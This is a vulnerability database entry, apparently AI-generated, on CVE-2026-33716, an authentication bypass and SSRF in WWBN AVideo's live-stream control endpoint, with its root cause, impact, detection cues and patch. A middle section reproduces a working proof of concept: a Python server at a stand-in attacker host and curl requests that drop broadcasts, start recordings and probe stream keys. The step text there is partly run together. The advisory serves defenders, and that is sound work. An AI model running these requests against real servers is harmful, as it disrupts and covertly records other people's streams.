
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33716 is an authentication bypass vulnerability in WWBN AVideo, an open source video platform, affecting versions up to and including 26.0. The flaw resides in the standalone live stream control endpoint plugin/Live/standAloneFiles/control.json.php, which accepts a user-supplied streamerURL parameter that overrides the server's token verification destination, allowing unauthenticated attackers to redirect verification to an attacker-controlled server. Disclosed on March 23, 2026, it carries a CVSS v3.1 base score of 9.4 (Critical) (Github Advisory, GitHub Security Advisory).
The root cause is improper authentication (CWE-287): the control.json.php endpoint reads the streamerURL parameter directly from $_REQUEST without any validation and uses it to construct the token verification URL via file_get_contents(). The legitimate verifyToken.json.php performs cryptographic validation via Live::decryptHash() with a 12-hour expiry window, but by pointing verification at an attacker-controlled server that always returns {"error": false}, all authentication is bypassed. SSL certificate verification is also explicitly disabled in the request context, meaning the SSRF request follows any attacker-supplied URL unconditionally. Notably, the developers had already applied an equivalent fix to the sibling file saveDVR.json.php on 2026-03-19 with an explicit SSRF warning comment, but the same fix was not applied to control.json.php (Github Advisory, GitHub Security Advisory).
Successful exploitation allows any unauthenticated remote attacker to issue control commands to the NGINX RTMP module, including drop_publisher (terminating active live broadcasts), record_start/record_stop (starting or stopping recordings of any stream without authorization), and is_recording (enumerating valid stream keys). The SSRF component additionally enables the server to make outbound HTTP requests to attacker-controlled infrastructure, potentially exposing internal services or facilitating data exfiltration. Confidentiality impact is low (stream enumeration and SSRF), while integrity and availability impacts are high due to unauthorized recording and stream disruption (Github Advisory).
A detailed proof-of-concept exploit is publicly available in the GitHub Security Advisory, including specific curl commands and a minimal Python server that can be used to execute the attack against any vulnerable AVideo deployment with no credentials required (GitHub Security Advisory). The EPSS score is approximately 0.106% (28th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing. No threat actor attribution has been reported at this time (Github Advisory).
/plugin/Live/standAloneFiles/control.json.php endpoint for a response.attacker.example.com:8888) that responds to all GET requests with {"error": false}:python3 -c '
import http.server, json
class H(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type","application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": False}).encode())
def log_message(self, *a): pass
http.server.HTTPServer(("0.0.0.0", 8888), H).serve_forever()
'streamerURL pointing to the attacker server and any arbitrary token value:curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=drop_publisher&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"drop_publisher with record_start to begin recording any active stream:curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=record_start&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"is_recording to probe for valid stream names by iterating over guessed stream keys:curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=is_recording&name=GUESS_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"/plugin/Live/standAloneFiles/control.json.php with a streamerURL parameter pointing to external or non-local hosts.control.json.php with streamerURL query parameters containing external IP addresses or domains; PHP error logs (error_log) entries from control.json.php with unusual streamerURL values; NGINX RTMP control log entries for drop/publisher, record/start, or record/stop commands not initiated by legitimate users.drop_publisher commands); unauthorized recording files appearing in the recording directory; repeated probing of stream keys via is_recording with varying name parameters.
(GitHub Security Advisory)Apply the patch in commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128, which removes the user-supplied streamerURL override in control.json.php and sanitizes the name parameter to prevent path traversal (GitHub Patch). If an immediate upgrade is not possible, restrict network access to the plugin/Live/standAloneFiles/control.json.php endpoint to trusted IP ranges only via web server or firewall rules, and implement egress filtering to block outbound requests from the PHP process to arbitrary external hosts. Monitor web server logs for requests to this endpoint containing a streamerURL parameter as a detection measure (Github Advisory).
The vulnerability received coverage from The Hacker Wire and Yazoul security advisory sites shortly after disclosure (The Hacker Wire, Yazoul Advisory). Security Online Info also covered the vulnerability as part of a broader report on critical AVideo vulnerabilities (Security Online). Community discussion was noted on Mastodon and Bluesky, and the advisory was indexed by GitLab's advisory database (GitLab Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."